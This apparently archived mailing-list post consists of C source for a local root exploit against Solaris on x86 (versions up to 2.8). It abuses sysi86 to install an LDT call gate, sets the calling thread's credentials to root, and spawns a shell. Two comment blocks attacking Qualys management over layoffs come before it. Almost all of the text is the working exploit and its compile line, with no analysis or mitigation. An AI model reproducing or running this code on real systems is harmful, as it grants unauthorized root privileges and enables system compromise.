/*
*
* Team,
*
* As Qualys took the opportunity to move forward to becoming a
* successful global company we would like to extend our condolences
* to the development team that suffered some collateral damage during
* the transition from a knowledge and friendship based company to
* a greedy and unhuman one.
*
* Who is responsible for this?
*
* tschuess
*
*/
/*
*
* Managers,
*
* After firing the dev team, including founders of the company,
* all you have left behind is sadness in their hearts... and total
* incompetence in your circles.
*
* Knowledge is power, but you do not have both.
*
*/
/*
* solaris i86 <= 2.8 local root
*
* gcc -Wall -O2 -fomit-frame-pointer -o callgate callgate.c
*
* lsd-pl, too bad we did not join the argus challenge...
*/
#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <limits.h>
#include <time.h>
#include <errno.h>
#include <sys/cpuvar.h>
#include <sys/sysi86.h>
#include <sys/segment.h>
void getroot(void)
{
register cpu_t* cpu=NULL; /* magic ;-) */
register kthread_id_t thread;
register struct cred* cred;
__asm__ __volatile__ ("pushl %%ds; pushl %0; popl %%ds;" : : "i" (KGSSEL));
thread = cpu->cpu_thread;
__asm__ __volatile__ ("pushl %0; popl %%ds;" : : "i" (KDSSEL));
cred = thread->t_cred;
cred->cr_uid = 0;
cred->cr_ruid = 0;
cred->cr_suid = 0;
cred->cr_gid = 0;
cred->cr_rgid = 0;
cred->cr_sgid = 0;
__asm__ __volatile__ ("pop %ds; lret;");
}
int main(int argc, char *argv[])
{
struct ssd ldt_arg;
ldt_arg.bo = (unsigned int) getroot;
ldt_arg.ls = KCSSEL;
ldt_arg.acc1 = 0xEC;
ldt_arg.acc2 = 0;
ldt_arg.sel = 7;
if (!sysi86(SI86DSCR, &ldt_arg)) {
__asm__ __volatile__ ("lcall $7,$0");
execl("/bin/sh", "/bin/sh", NULL);
}
return 0;
}
This archive was generated by hypermail 2b30 : Wed Jan 09 2002 - 07:45:11 PST